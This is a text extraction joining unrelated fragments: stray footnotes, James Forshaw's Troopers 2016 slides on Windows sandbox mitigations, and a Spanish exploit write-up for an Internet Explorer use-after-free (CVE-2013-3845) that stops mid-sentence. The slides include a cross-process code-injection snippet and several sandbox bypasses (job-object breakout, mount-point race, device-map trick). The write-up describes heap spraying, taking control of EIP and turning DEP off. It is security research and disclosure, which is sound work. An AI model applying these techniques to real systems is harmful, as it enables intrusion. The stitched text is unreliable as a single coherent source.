15If you don’t trust our taste, read Ben’s masterpiece https://lists.immunityinc.com/pipermail/dailydave/2012-August/
000187.html , and judge for yourself!
16For in-depth discussion, see [PXE] http://ph-neutral.darklab.org/PXE.txt and [PXE2] http://ph-neutral.darklab.
org/PXE2.txt
14The Joy of 
Sandbox Mitigations 
James Forshaw @tiraniddo 
Troopers 2016 
1

James Forshaw @tiraniddo What I’m Going to Talk About 
●Sandbox related mitigations added to Windows since Windows 8 
●Hardcore reverse engineering of the implementation 
●What’s supported and how you can use them yourself 
●What is blocked if you’re investigating sandbox attack surface 
●Weird bugs and edge cases with the implementation 
●Research on Windows 8.1 and 10 build 10586 
2
James Forshaw @tiraniddo WARNING 
A huge amount of code snippets is approaching. 
Sorry? 
3
James Forshaw @tiraniddo In the Beginning was DEP 
4

James Forshaw @tiraniddo The External Attacker’s Viewpoint 
5Mitigations: 
DEP
ASLR 
SafeSEH 
Stack Cookies 
Control Flow Guard (CFG) 
etc.
System Services Kernel Services Device Drivers 
Prevent RCE Target Process 
James Forshaw @tiraniddo The Defender’s Dilemma 
Assume Compromise 
6
James Forshaw @tiraniddo Sandboxing to the Rescue? 
7Sandboxed Target Process User Applications System Services Kernel Services Device Drivers 
Prevent RCE Prevent EoP 

James Forshaw @tiraniddo Technical Mitigations 
8Reduce Attack 
Surface 
Increase Exploit 
CostReduce Exploit 
Reliability 

James Forshaw @tiraniddo Technical Mitigations 
9Reduce Attack 
Surface 
Increase Exploit 
CostReduce Exploit 
Reliability 
$$
James Forshaw @tiraniddo Technical Mitigations 
10Reduce Attack 
Surface 
Increase Exploit 
CostReduce Exploit 
Reliability 

James Forshaw @tiraniddo Categories of Windows Sandbox Mitigations 
Implicit Mitigations 
●On by default when running 
sandboxed code 
●Applies to select features 
which shouldn’t affect typical 
backwards compatibility 
support 
●Focus more on breaking 
chains and making 
exploitation harder 
11Explicit Mitigations 
●Mitigations which must be 
actively enabled 
●Usually more disruptive, 
requires changes to existing 
code to support 
●Aim to reduce attack surface 
or increase exploitation costs 
James Forshaw @tiraniddo Explicit Mitigations 
12
James Forshaw @tiraniddo Setting an Explicit Mitigation Policy 
13
Policy Type 
Accompanying Data 
James Forshaw @tiraniddo PROCESS_MITIGATION_POLICY 
14Policy Supported Win8.1 Update 2 Supported Win10 TH2 
ProcessDEPPolicy Yes Yes
ProcessASLRPolicy Yes Yes
ProcessDynamicCodePolicy Yes Yes
ProcessStrictHandleCheckPolicy Yes Yes
ProcessSystemCallDisablePolicy Yes Yes
ProcessMitigationOptionsMask Invalid Invalid 
ProcessExtensionPointDisablePolicy Yes Yes
ProcessControlFlowGuardPolicy Invalid Invalid 
ProcessSignaturePolicy Yes* Yes
ProcessFontDisablePolicy No Yes
ProcessImageLoadPolicy No Yes
* Not supported through SetProcessMitigationPolicy 
James Forshaw @tiraniddo PROCESS_MITIGATION_POLICY 
15Policy Supported Win8.1 Update 2 Supported Win10 TH2 
ProcessDEPPolicy Yes Yes
ProcessASLRPolicy Yes Yes
ProcessDynamicCodePolicy Yes Yes
ProcessStrictHandleCheckPolicy Yes Yes
ProcessSystemCallDisablePolicy Yes Yes
ProcessMitigationOptionsMask Invalid Invalid 
ProcessExtensionPointDisablePolicy Yes Yes
ProcessControlFlowGuardPolicy Invalid Invalid 
ProcessSignaturePolicy Yes* Yes
ProcessFontDisablePolicy No Yes
ProcessImageLoadPolicy No Yes
* Not supported through SetProcessMitigationPolicy 
James Forshaw @tiraniddo Under the Hood 
const  int ProcessMitigationPolicy = 52;
struct  PROCESS_MITIGATION {
  PROCESS_MITIGATION_POLICY Policy ;
  DWORD Flags ;
};
PROCESS_MITIGATION m = {ProcessSignaturePolicy , 1};
NtSetInformationProcess (GetCurrentProcess (), 
            ProcessMitigationPolicy , &m, sizeof (m));
16
James Forshaw @tiraniddo Under the Hood 
const  int ProcessMitigationPolicy = 52;
struct  PROCESS_MITIGATION {
  PROCESS_MITIGATION_POLICY Policy ;
  DWORD Flags ;
};
PROCESS_MITIGATION m = {ProcessSignaturePolicy , 1};
NtSetInformationProcess (GetCurrentProcess (), 
            ProcessMitigationPolicy , &m, sizeof (m));
17Can’t specify anything other 
than current process, it will fail. 
James Forshaw @tiraniddo Apply During Create Process 
LPPROC_THREAD_ATTRIBUTE_LIST attr_list = ... // Allocated 
InitializeProcThreadAttributeList (attr_list , 1, 0, &size );
DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_ ...; 
UpdateProcThreadAttribute (attr_list , 0, 
    PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY , &policy , 
    sizeof (policy ), nullptr , nullptr );
startInfo .StartupInfo .cb = sizeof (startInfo );
startInfo .lpAttributeList = attr_list ;
// Create Process with EXTENDED_STARTUPINFO_PRESENT flag 
18I’ll abbreviate PROCESS_CREATION_MITIGATION_POLICY to PCMP otherwise it gets too long Process Attribute for Mitigation Policy 
James Forshaw @tiraniddo Image File Execution Options 
●Specify REG_QWORD value MitigationOptions  with same bit fields 
as used at process creation. 
19
Registry Value 
Executable Name 
James Forshaw @tiraniddo Image File Execution Options Filter 
20

James Forshaw @tiraniddo Demo Time! 
Simple Mitigation Tests 
21
James Forshaw @tiraniddo Dynamic Code Policy 
struct  PROCESS_MITIGATION_DYNAMIC_CODE_POLICY {
    union  {
        DWORD Flags ;
        struct  {
            DWORD ProhibitDynamicCode : 1;
            DWORD ReservedFlags : 31;
        };
    };
}
PCMP_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON  (1 << 36)
22Category: Increase Exploit Cost, Reduce Reliability 
James Forshaw @tiraniddo What Does it Disable? 
●Calling VirtualAlloc with PAGE_EXECUTE_* 
●MapViewOfFile with FILE_MAP_EXECUTE option 
●Calling VirtualProtect with PAGE_EXECUTE_* etc. 
●Reconfiguring the CFG bitmap via SetProcessValidCallTargets 
23It doesn’t disable loading 
DLLs/Image Sections! 
James Forshaw @tiraniddo Under the Hood 
NTSTATUS MiArbitraryCodeBlocked (EPROCESS *Process ) {
  if (Process ->Flags2 & DYNAMIC_CODE_BLOCKED_FLAG )
    return  STATUS_DYNAMIC_CODE_BLOCKED ;
  return  STATUS_SUCCESS ;
}
24Might assume the Process 
argument is the target process. 
You’d be wrong of course! 
It’s the calling process. 
James Forshaw @tiraniddo Fun Use Case 
25Sandboxed Process Unsandboxed Process 
void  InjectExecutableCode (DWORD dwPid , PBYTE pData , SIZE_T nSize ) {
  HANDLE hProcess = OpenProcess (dwPid , 
                        PROCESS_VM_WRITE | PROCESS_VM_OPERATION );
  LPVOID pMem = VirtualAllocEx (hProcess , 
                        PAGE_EXECUTE_READWRITE , nSize );
  WriteProcessMemory (hProcess , pMem , pData , nSize );
}New Executable 
Memory VirtualAllocEx
Create With Dynamic 
Code Mitigation 
James Forshaw @tiraniddo Binary Signature Policy 
struct  PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY {
    union  {
        DWORD Flags ;
        struct  {
            DWORD MicrosoftSignedOnly : 1;
            DWORD StoreSignedOnly : 1; // Win10 Only. 
            DWORD MitigationOptIn : 1; // Win10 Only. 
            DWORD ReservedFlags : 29;
        };
    };
};
PCMP_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON  (1 << 44)
26Category: Increase Exploit Cost, Reduce Reliability 
Can only specify Microsoft Signed at Process Creation 
James Forshaw @tiraniddo Under the Hood 
case  ProcessSignaturePolicy :       
 if (policy .MicrosoftSignedOnly ) {
   process ->SignatureLevel = 8;
   process ->SectionSignatureLevel = 8;
 } else  if (policy .StoreSignedOnly ) {
   process ->SignatureLevel = 6;
   process ->SectionSignatureLevel = 6;
 } 
 process ->Flags2 |= 0x2000 ;
27MitigationOptIn is used to set the Flags2 flag, which opts into Store Signing 
checks if an image is loaded which requires code signing. 
James Forshaw @tiraniddo Fun Use Case 
28Unsigned 
Sandboxed Process Unsandboxed Process 
void * InjectExecutableImage (DWORD dwPid , HANDLE hMap ) {
  LPVOID lpMap = NULL ;
  HANDLE hProcess = OpenProcess (dwPid , 
                    PROCESS_VM_WRITE | PROCESS_VM_OPERATION );
  NtMapViewOfSection (hMap , hProcess , &lpMap , 0, 
     4096 , nullptr , &viewsize , 
     ViewUnmap , 0, PAGE_EXECUTE_READWRITE );
  return  lpMap ;
}New Executable 
Image Section NtMapViewOfSection
Create With Process 
Mitigation 
Signature check 
NOT  enforced on 
main executable. 
NtMapViewOfSection can 
take a process handle 
James Forshaw @tiraniddo Image Load Policy (Win10 Only) 
struct  PROCESS_MITIGATION_IMAGE_LOAD_POLICY {
    union  {
        DWORD Flags ;
        struct  {
            DWORD NoRemoteImages : 1;
            DWORD NoLowMandatoryLabelImages : 1;
            DWORD ReservedFlags : 30;
        };
    };
};
PCMP_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON    (1 << 52)
PCMP_IMAGE_LOAD_NO_LOW_LABEL_ALWAYS_ON (1 << 56)
29Category: Increase Exploit Cost, Reduce Reliability 
James Forshaw @tiraniddo Under the Hood 
NTSTATUS MiAllowImageMap (EPROCESS *process , SECTION * 
section )
{
  unsigned  int flags3 = process ->Flags3 ;
  if (flags3 & PROCESS_FLAGS3_NOREMOTEIMAGE && 
      (section ->FileObject ->RemoteImageFileObject || 
       section ->FileObject ->RemoteDataFileObject ))
    return  STATUS_ACCESS_DENIED ;
    
  if (flags3 & PROCESS_FLAGS3_NOLOWILIMAGE ) {
    DWORD il = 0;
    SeQueryObjectMandatoryLabel (section ->FileObject , &il);
    if (il <= SECURITY_MANDATORY_LOW_RID )
      return  STATUS_ACCESS_DENIED ;
  }  
  return  STATUS_SUCCESS ;
}
30
James Forshaw @tiraniddo Font Disable Policy (Win10 Only) 
struct  PROCESS_MITIGATION_FONT_DISABLE_POLICY {
    union  {
        DWORD Flags ;
        struct  {
            DWORD DisableNonSystemFonts     : 1;
            DWORD AuditNonSystemFontLoading : 1;
            DWORD ReservedFlags             : 30;
        };
    };
};
PCMP_FONT_DISABLE_ALWAYS_ON (1 << 48)
PCMP_AUDIT_NONSYSTEM_FONTS  (3 << 48)
31Category: Reduced Attack Surface 
James Forshaw @tiraniddo Font Disable Auditing 
32

James Forshaw @tiraniddo Also Available in EMET 5.5 
33

James Forshaw @tiraniddo Under the Hood 
●Win32k shouldn’t have insider knowledge of EPROCESS Flags 
34int GetCurrentProcessFontLoadingOption ()
{
  PROCESS_MITIGATION_FONT_DISABLE_POLICY policy ;
  
  ZwQueryInformationProcess ((HANDLE )-1, 
     ProcessMitigationPolicy , &policy , sizeof (policy ), 0);  
  if (policy .DisableNonSystemFonts )
    return  2;
  else 
    return  policy .AuditNonSystemFontLoading ;
}

James Forshaw @tiraniddo How it Works 
35int WIN32K::bLoadFont (...)  {
  int load_option = GetCurrentProcessFontLoadingOption ();
  bool system_font = true ;
  if (load_option ) {
    HANDLE hFile = hGetHandleFromFilePath (FontPath );
    BOOL system_font = bIsFileInSystemFontsDir (hFile );
    ZwClose (hFile );
    if (!system_font ) {
      LogFontLoadAttempt (FontPath );
      if (load_option == 2)
        return  0;
    }
  }
  HANDLE hFont = hGetHandleFromFilePath (FontPath );
  // Map font as section 
}
James Forshaw @tiraniddo Demo Time! 
Bypass Font Path Check 
36
James Forshaw @tiraniddo Syscall Disable Policy 
struct  PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY {
    union  {
        DWORD Flags ;
        struct  {
            DWORD DisallowWin32kSystemCalls : 1;
            DWORD ReservedFlags : 31;
        };
    };
};
PCMP_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON (1 << 28)
37Category: Reduced Attack Surface 
James Forshaw @tiraniddo Win32k Syscall Disable Implementation? 
SyscallEnter () {
  // Setup entry. 
  if (IsWin32kSyscall (SyscallNumber ) && 
      CurrentProcess ->Flags2 & WIN32K_SYSCALL_DISABLE ) {
    return  STATUS_ACCESS_DENIED ;
  }
  
  // Continue normal system call dispatch. 
}
38
James Forshaw @tiraniddo Win32k Syscall Disable 
SyscallEnter () {
  SERVICE_TABLE * table = 
               KeGetCurrentThread ()-> ServiceTable ;
  
  // Setup entry. 
  if (IsWin32Syscall (SyscallNo ) && 
      SyscallNo & 0xFFF  > table ->Shadow .Length )
    if (PsConvertToGuiThread () != STATUS_SUCCESS )
      return  GetWin32kResult (SyscallNo );
  }
  
  // Continue normal system call dispatch. 
}
39
James Forshaw @tiraniddo Win32k Syscall Disable is Per Thread 
NTSTATUS PsConvertToGuiThread () {
  KTHREAD *thread = KeGetCurrentThread ();
  EPROCESS *process = thread ->Process ;
  if (thread ->ServiceTable != &KeServiceDescriptorTable )
    return  STATUS_ALREADY_WIN32 ;  
  if (process ->Flags2 & WIN32K_SYSCALL_DISABLE )
    return  STATUS_ACCESS_DENIED ;
  thread ->ServiceTable = &KeServiceDescriptorTableShadow ;
  NTSTATUS result = PsInvokeWin32Callout (THREAD_INIT , 
                                         & thread );
  if (result < 0)
    thread ->ServiceTable = &KeServiceDescriptorTable ;
  return  result ;
}
40
James Forshaw @tiraniddo Late Enable Initial Thread Problem 
41Sandboxed Process Ntdll.dll 
LdrxCallInitRoutine Load 
user32.dll 
UserClientDllInitialize() gdi32.dll 
GdiDllInitialize() combase.dll 
ComBaseInitialize() Kernel/Win32k 
Initial Thread now a GUI Thread! 
James Forshaw @tiraniddo Disable Dynamically 
case  ProcessSystemCallDisablePolicy :
  PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY policy ;
  if (!policy .DisallowWin32kSystemCalls 
      && process ->Flags2 & WIN32K_SYSCALL_DISABLE ) {
    return  STATUS_ACCESS_DENIED ;
  }  
  process ->Flags2 |= WIN32K_SYSCALL_DISABLE ;  
  if (thread ->ServiceTable != &KeServiceDescriptorTable ) {
    return  STATUS_TOO_LATE ;
  }
42We are too late for this thread, but it’
ll still enable the mitigation for the 
process 
James Forshaw @tiraniddo Set at Process Creation 
43Sandboxed Process Ntdll.dll 
LdrxCallInitRoutine Load 
user32.dll 
UserClientDllInitialize() gdi32.dll 
GdiDllInitialize() combase.dll 
ComBaseInitialize() Kernel/Win32k 
James Forshaw @tiraniddo Set at Process Creation 
44Sandboxed Process Ntdll.dll 
LdrxCallInitRoutine Load 
user32.dll 
UserClientDllInitialize() gdi32.dll 
GdiDllInitialize() combase.dll 
ComBaseInitialize() Kernel/Win32k 

James Forshaw @tiraniddo How Does Chrome Do It? 
●Chrome hooks the NtMapViewOfSection system call in NTDLL. 
●Patches GdiDllInitialize before anything has a chance to call it. 
45BOOL WINAPI TargetGdiDllInitialize (
    GdiDllInitializeFunction orig_gdi_dll_initialize ,
    HANDLE dll ,
    DWORD reason ) {
  return  TRUE ;
}
HGDIOBJ WINAPI TargetGetStockObject (
    GetStockObjectFunction orig_get_stock_object ,
    int object ) {
  return  reinterpret_cast <HGDIOBJ >(NULL );
}
ATOM WINAPI TargetRegisterClassW (
    RegisterClassWFunction orig_register_class_function ,
    const  WNDCLASS * wnd_class ) {
  return  TRUE ;
}

James Forshaw @tiraniddo 
Syscall Return Values 
46Expect NULL on error Really NtGdiCreateCompatibleDC System Call 
Expect a valid HDC on success 
Really NtUserGetDC System Call 
James Forshaw @tiraniddo 
Let’s Test 
47Erm? 0xC000001C neither valid HDC or NULL GetDC Looks okay 
James Forshaw @tiraniddo Handling Return Code 
INT32 GetWin32kResult (DWORD SyscallNo ) {
  if (SyscallNo & 0xFFF  < ShadowTableLength ) {
    INT8 * ReturnCodes = 
       ( INT8 *)&ShadowTable [ShadowTableLength ];
    INT32 Result = ReturnCodes [SyscallNo & 0xFFF ];
    if (Result <= 0)
      return  Result ;
  }
  return  STATUS_INVALID_SYSTEM_SERVICE ;
}
48Just happens to equal 0xC000001C, 
returned if Result > 0 Return code map at end of shadow table 
Pass through value is <= 0 
James Forshaw @tiraniddo ●No policies can be disabled once set in-process. 
●However only a small subset of mitigations are inherited 
●See PspApplyMitigationOptions. 
●we need to block new process creation. Process Mitigations Inheritance 
49Policy Inherited 
Dynamic Code No
System Call Disable Yes
Signature No
Font Disable No
Image Load Yes
James Forshaw @tiraniddo Job Objects to the Rescue 
50
1 Active Process 
No Breakout Allowed 
Can’t create new process 
James Forshaw @tiraniddo Job Object The Trouble with Job Objects 
51WMI Service 
Win32_Process::Create 
User Process 
Console Driver 
AllocConsole 
Kernel 
James Forshaw @tiraniddo Job Object The Trouble with Job Objects 
52WMI Service 
Win32_Process::Create 
User Process 
Console Driver 
AllocConsole 
Kernel 
notepad.exe 
James Forshaw @tiraniddo Job Object The Trouble with Job Objects 
53WMI Service 
Win32_Process::Create 
User Process 
Console Driver 
AllocConsole 
Kernel 
conhost.exe 
https://bugs.chromium.org/p/project-zero/issues/detail?id=213 Kernel can specify to breakout 
of job object, normally 
required TCB privilege. 
James Forshaw @tiraniddo Job Object The Trouble with Job Objects 
54WMI Service 
Win32_Process::Create 
User Process 
Console Driver 
AllocConsole 
Kernel 
conhost.exe 
notepad.exe 
Open Process and Inject Code 
James Forshaw @tiraniddo New Process Attribute for Win10 TH2 
const  int ProcThreadAttributeChildProcessPolicy   = 14;
//
// Define Attribute to disable creation of child process 
//
#define PROCESS_CREATION_CHILD_PROCESS_RESTRICTED   0x01 
#define PROCESS_CREATION_CHILD_PROCESS_OVERRIDE     0x02 
#define PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY \ 
 ProcThreadAttributeValue( 
        ProcThreadAttributeChildProcessPolicy, 
        FALSE, TRUE, FALSE) 
55
James Forshaw @tiraniddo Pretty Effective Mitigation 
56WMI Service 
Win32_Process::Create 
User Process 
Console Driver 
AllocConsole 
Kernel 
conhost.exe 
notepad.exe PROCESS_CREATION_RESTRICTED 
James Forshaw @tiraniddo Inside SeSubProcessToken 
DWORD ChildProcessPolicyFlag = // From process attribute. 
BOOLEAN ChildProcessAllowed = TokenObject ->TokenFlags &
                                CHILD_PROCESS_RESTRICTED ;
if (!ChildProcessAllowed ) {
  if (!(ChildProcessPolicyFlag & 
              PROCESS_CREATION_CHILD_PROCESS_OVERRIDE ) 
       || !SeSinglePrivilegeCheck (SeTcbPrivilege ))
      return  STATUS_ACCESS_DENIED ;
}
SepDuplicateToken (TokenObject , ...,  &NewTokenObject );
if (ChildProcessPolicyFlag & 
            PROCESS_CREATION_CHILD_PROCESS_RESTRICTED )
   NewTokenObject ->TokenFlags |= CHILD_PROCESS_RESTRICTED ;
57Mitigation is on Token not Process 
James Forshaw @tiraniddo Low Box Tokens (AppContainers) 
●Many specific checks in the kernel for lowbox tokens 
○No NULL DACL access 
○Limited access to ATOM tables 
●Capabilities which prevent access to things like network stack 
●No read-up by default 
●COM marshaling mitigations 
○Marshaled objects from AppContainers are untrusted 
●Driver Traversal Check 
○Undocumented 
FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL device 
characteristic 
58
James Forshaw @tiraniddo Implicit Mitigations 
59
James Forshaw @tiraniddo ExIsRestrictedCaller 
●Kernel function introduced in  Windows 8.1 
●Indicates whether the caller is “restricted”, what this actually means 
in practice is whether the caller has an IL < Medium or is a Low Box 
Token 
●Only used to filter out sensitive kernel addresses to limit KASLR 
leaks 
○Blocks profiling kernel addresses 
○Limits access to handle list which contains object addresses 
○Limits access to object type information 
○Limits thread and process information which leaks kernel addresses 
●More information on Alex Ionescu’s blog: 
○http://www.alex-ionescu.com/?p=82 
60
James Forshaw @tiraniddo RtlIsSandboxedToken 
●Very similar function to ExIsRestrictedCaller, but passes an token 
●Introduced in Windows 10 but backported to Windows 7 
61BOOLEAN RtlIsSandboxedToken (PSECURITY_SUBJECT_CONTEXT 
                            SubjectSecurityContext ) {
  SECURITY_SUBJECT_CONTEXT SecurityContext ;
  if (!SubjectSecurityContext ) {    
    SeCaptureSubjectContext (&SecurityContext );
    SubjectSecurityContext = &SecurityContext ;
  }
  return  !SeAccessCheck (
         SeMediumDaclSd ,
         SubjectSecurityContext ,         
         0x20000u );
}
James Forshaw @tiraniddo Blocking Object Manager Symbolic Links 
62Sandboxed Process Unsandboxed Process 
Symbolic Link 
Object NTSTATUS NtCreateSymbolicLinkObject (...)  {
  // ... 
  OBJECT_SYMBOLIC_LINK Object ;
  
  // Setup object.    
  Object ->Flags = RtlIsSandboxedToken (NULL ) 
                         ?  2 : 0;
}
James Forshaw @tiraniddo Blocking Object Manager Symbolic Links 
63Sandboxed Process Unsandboxed Process 
Symbolic Link 
Object NTSTATUS ObpParseSymbolicLink (...)  {
  // ... 
  if (Object ->Flags & 2 
      && !RtlIsSandboxedToken (NULL ))
   return  STATUS_OBJECT_NAME_NOT_FOUND ;
}
James Forshaw @tiraniddo Blocking Registry Key Symbolic Links 
NTSTATUS CmpCheckCreateAccess (...)  {  
  BOOLEAN AccessGranted = SeAccessCheck (...); 
  if (AccessGranted && 
      CreateOptions & REG_OPTION_CREATE_LINK && 
      RtlIsSandboxedToken ()) {
    return  STATUS_ACCESS_DENIED ;
  }
}
64NTSTATUS CmSetValueKey (...)  {
  if(Type == REG_LINK && 
     RtlEqualUnicodeString (&CmSymbolicLinkValueName , 
                           ValueName , TRUE ) &&
     RtlIsSandboxedToken ())
     return  STATUS_ACCESS_DENIED ;
}
James Forshaw @tiraniddo Blocking NTFS Mount Points 
NTSTATUS IopXxxControlFile (...)  {
  if (ControlCode == FSCTL_SET_REPARSE_POINT && 
      RtlIsSandboxedToken ()) {
    status = FsRtlValidateReparsePointBuffer (buffer );
    if (status < 0)
      return  status ;
    if (buffer .ReparseTag == IO_REPARSE_TAG_MOUNT_POINT ) {
      InitializeObjectAttributes (&ObjAttr , 
                   reparse_buffer .PathBuffer , ...); 
      status = ZwOpenFile (&FileHandle , FILE_GENERIC_WRITE , 
            &ObjAttr , ...,  FILE_DIRECTORY_FILE );
      if (status < 0)
        return  status ;
       // Continue. 
    }
  }
} 
65Checks target is a directory and 
writable 
James Forshaw @tiraniddo TOCTOU Setting Mount Point 
66Sandboxed Process Unsandboxed Process 
Mount Point Non-Writable 
Directory Writable 
Directory Set Mount Point 
James Forshaw @tiraniddo TOCTOU Setting Mount Point 
67Sandboxed Process Unsandboxed Process 
Mount Point Non-Writable 
Directory Writable 
Directory Same Path, 
Different Target. 
James Forshaw @tiraniddo TOCTOU Setting Mount Point 
68Sandboxed Process Unsandboxed Process 
Mount Point Non-Writable 
Directory Writable 
Directory Write me a file! 
James Forshaw @tiraniddo Blocking NTFS Mount Points 
69\??\C:\windows 
Per-User \Device\HarddiskVolume1 \windows 
Device Map Directory Drive Letter Symbolic Link Volume Path 
James Forshaw @tiraniddo Blocking NTFS Mount Points 
70\??\C:\windows 
Per-User \Device\HarddiskVolume1 \windows 
Device Map Directory Drive Letter Symbolic Link Volume Path 
James Forshaw @tiraniddo Per-Process Device Map 
71const  int ProcessDeviceMap = 23;
struct  PROCESS_DEVICEMAP_INFORMATION {
    HANDLE DirectoryHandle ;
};
bool  SetProcessDeviceMap (HANDLE hDir ) {
    PROCESS_DEVICEMAP_INFORMATION DeviceMap = {hDir };
    NTSTATUS status = NtSetInformationProcess (
                          GetCurrentProcess (),
                          ProcessDeviceMap ,
                          &DeviceMap ,
                          sizeof (DeviceMap ));
    return  status == 0;
}
James Forshaw @tiraniddo Blocking NTFS Mount Points 
72\??\C:\windows 
Per-Process Object Directory C:Symlink \windows 
Device Map Directory Fake Drive Letter Symbolic 
LinkFake Volume 
Path
Writable Directory 
James Forshaw @tiraniddo Blocking Process Device Map 
NTSTATUS NtSetInformationProcess (...) { 
    // ... 
    
    case  ProcessDeviceMap :
      HANDLE hDir = *(HANDLE *)Data ;
      if (RtlIsSandboxedToken ())
        return  STATUS_ACCESS_DENIED ;
      return  ObSetDeviceMap (ProcessObject , hDir );
    // ... 
}
73https://bugs.chromium.org/p/project-zero/issues/detail?id=486 
James Forshaw @tiraniddo Bypass Using Anonymous Token 
74\??\C:\windows 
Anonymous User Object Directory C:Symlink \windows 
Device Map Directory Fake Drive Letter Symbolic 
LinkFake Volume 
Path
Writable Directory Call ImpersonateAnonymousToken() 
https://bugs.chromium.org/p/project-zero/issues/detail?id=573 
https://bugs.chromium.org/p/project-zero/issues/detail?id=589 
James Forshaw @tiraniddo NTFS Hard Links 
75

James Forshaw @tiraniddo Never Give a Vendor a Preview of your Slides 
76
Hey Microsoft, 
want to check my 
44con slides? 

James Forshaw @tiraniddo Never Give a Vendor a Preview of your Slides 
77
Please redact 
the hardlink 
slides. We’ll 
fix it. 
James Forshaw @tiraniddo Never Give a Vendor a Preview of your Slides 
78
Oh :( We’ll you 
have 90 days... 

James Forshaw @tiraniddo Blocking NTFS Hardlinks 
NTSTATUS NtSetInformationFile (...)  {
  case  FileLinkInformation :
    ACCESS_MASK RequiredAccess = 0;
    if(RtlIsSandboxedToken ()) {
      RequiredAccess |= FILE_WRITE_ATTRIBUTES ;
    }
 
    ObReferenceObjectByHandle (FileHandle , RequiredAccess );
}
79Default, no access requires 
In sandbox needs write 
access 
https://bugs.chromium.org/p/project-zero/issues/detail?id=531 
James Forshaw @tiraniddo The Ultimate Set of Options for Win10 
●At least run with a lowbox token, ideally lowbox+restricted 
○Kicks in implicit sandbox mitigations 
●Disable dynamic code 
●Only allow Microsoft signed images to be loaded 
●Disable child process creation 
●Win32k Lockdown or at least block custom fonts 
●Prevent loading DLLs from untrusted locations 
80
James Forshaw @tiraniddo Wrapping Up 
81
James Forshaw @tiraniddo Conclusions 
●Microsoft adding more and more sandbox related mitigations to the 
core of Windows. Still a lot more could be done though. 
●They’re actively fixing issues with the mitigations, something they’
ve never really done before. 
●You can make a fairly secure sandbox, especially with attack 
surface reduction. 
82
James Forshaw @tiraniddo References and Source Code 
●Sandbox Analysis Tools 
○https://github.com/google/sandbox-attacksurface-analysis-tools 
●Symbolic Link Testing Tools 
○https://github.com/google/symboliclink-testing-tools 
●Chrome Windows Sandbox Code 
○https://code.google.
com/p/chromium/codesearch#chromium/src/sandbox/win/src/ 
83
James Forshaw @tiraniddo Questions? 
84
 
 
MS13 -069/CVE -2013 -3845: Microsoft 
Internet Explorer (CTreePos) use -
after -free vulnerability.  
 
 
Por: José A. Vázquez de  Yenteasy - Security Resea rch -  
 
Voy a contar detalles sobre CVE-2013 -3845  y aprovecharé para hacerlo en 
castellano que es como mejor me explico . Esta vulnerabilidad fue encontrada 
en Mayo de 2013 y h a sido un bug que, para aquellos que estamos 
acostumbrados a Microsoft, se ha solucionado en un plazo muy corto. 
Teniendo en cuenta que se resolvió con las actualizaciones de Septiembre . Un 
total de 3 meses (puede q ue 2 y medio desde que la recibieron).  Mis 
felicitaciones a MS por este plazo tan reducido.  
 
Allá por Mayo, una vez reducida la muestra tenía un aspecto similar a:  
 
 
Fig.1: Código fuente de la m uestra m ínima . 
 
Tirando la muestra desde un servidor web local contra IE8 y WinDBG, 
producirá un crash semejante a:  
 

Fig.2 : Traza del stack de la muestra mínima.  
 
Que como se aprecia a simple vista parece un crash sin interés. Sin embargo, 
si analizamos mediante el coma ndo !heap de WinDBG, observaremos como en 
el registro ESI hay un obje to lib erado de tamaño 0x60 bytes. Ese objeto 
corresponde a un objeto CTreePos . 
 
Bien. Ya sabemos que es un uso de un objeto previamente liberado (UAF o 
use-after-free). Ahora toca saber c ómo le podemos meter mano. Realmente 
para exploits en IE < 10 (donde no existe vtable guard) explotar este tipo de 
bugs es algo ampliamente sabido . Una vez identifi cado  el tamaño del objeto, 
habría que saber si es posible situar un objeto falso en lugar de l liberado . Para 
ello, debería existir un punto entre la liberación del objeto y su posterior re -uso 
donde, lógicamente mediante Javascript, sea posible inyectar nuestro objeto 
manipulado .  
 
Para hacer esto en primer lugar suelo recurrir al método más simp le. Esto es  
probar línea a línea. Si no me sirve, se pueden aplicar otros métodos como lo s 
que describió Alexander Sotirov  cuando creó heapLib.js , empleando las 
funciones aritméticas y breakpoints en WinDBG. Para este caso concreto, 
antes de hacer el scrollHeight, localizamos el punto de control del objeto. Con 
lo cual, deducimos que la liberación del objeto ocurre antes de la función 
scrollHeight  (probablemente ocurra  en el innerHTML)   y su posterior uso, con 
esta función o después. Así pues el POC nos queda de la siguiente forma:  
 

Fig.3 : Código fuente del control sobre objeto liberado.  
 
Donde se observa que defino dos funciones una para crear un  array de Divs  
(con 0x100  es suficiente ) y otra función que es la encargada de rellenar e l 
atributo className con cadenas de  0x0c’s de tamaño el mismo que el del 
objeto liberado (o sea 0x60 bytes). Una vez hecho esto, si lanzamos la muestra 
en IE8 con Win DBG resultará:  
 

Fig.4 : Traza del stack del control sobre el objeto.  
 
Bien, tenemos controlado el objeto en ESI, sin embargo  no caemos en una 
situación habit ual, quiero decir, la  gran mayoría de UAFs caen en situaciones 
más o menos semejantes a : 
 
mov reg 2, [reg 1] ;vtable  
mov reg 3, [reg 2+offset]  ;vtable+offset  = vfunc  
call reg3  ;control sobre EIP 
 
Pero este c aso en concreto no  es directo , aunque no resulta  difícil llegar si 
observamos la función mshtml!CTreePos::GetMarkup:  
 

Fig.5 : Función implicada en el crash.  
 
El punto que habría que alcanzar , y de hecho hay varias formas de hacerlo,  
sería:  
 
 
Fig.6 : Objetivo de nuestro heap spray.  
 
Donde las cosas empiezan a parecerse más a lo que estoy buscando. La más 
directa parece evitar cualquier salto y llegar hasta 0x3cee87ba  donde se llama 
a mshtml!CElement::GetMarkupPtr. Así pues situando en el heap cada cosa en 
su lugar obtendríamos:  
 

Fig.7 : Debugging del control sobre EIP.  
 
Bueno, no es el camino directo pero también sirve . Y el código necesario 
sería s imilar a:  
 
 
Fig.8 : Código fuente del código necesario para controlar EIP.  
 
Con esto ya tendríamos  EIP bajo control y podemos probar con DEP 
deshabilitado  si permite ejecutar una shellcode . Para ellos accede mos al 
boot.ini y modifica mos el parámetro /noexecute, situándolo de la siguiente 
forma: /noexecute=alwaysoff.  
 
Para saltar DEP , personalmente he empleado la API VirtualProtect que desde 
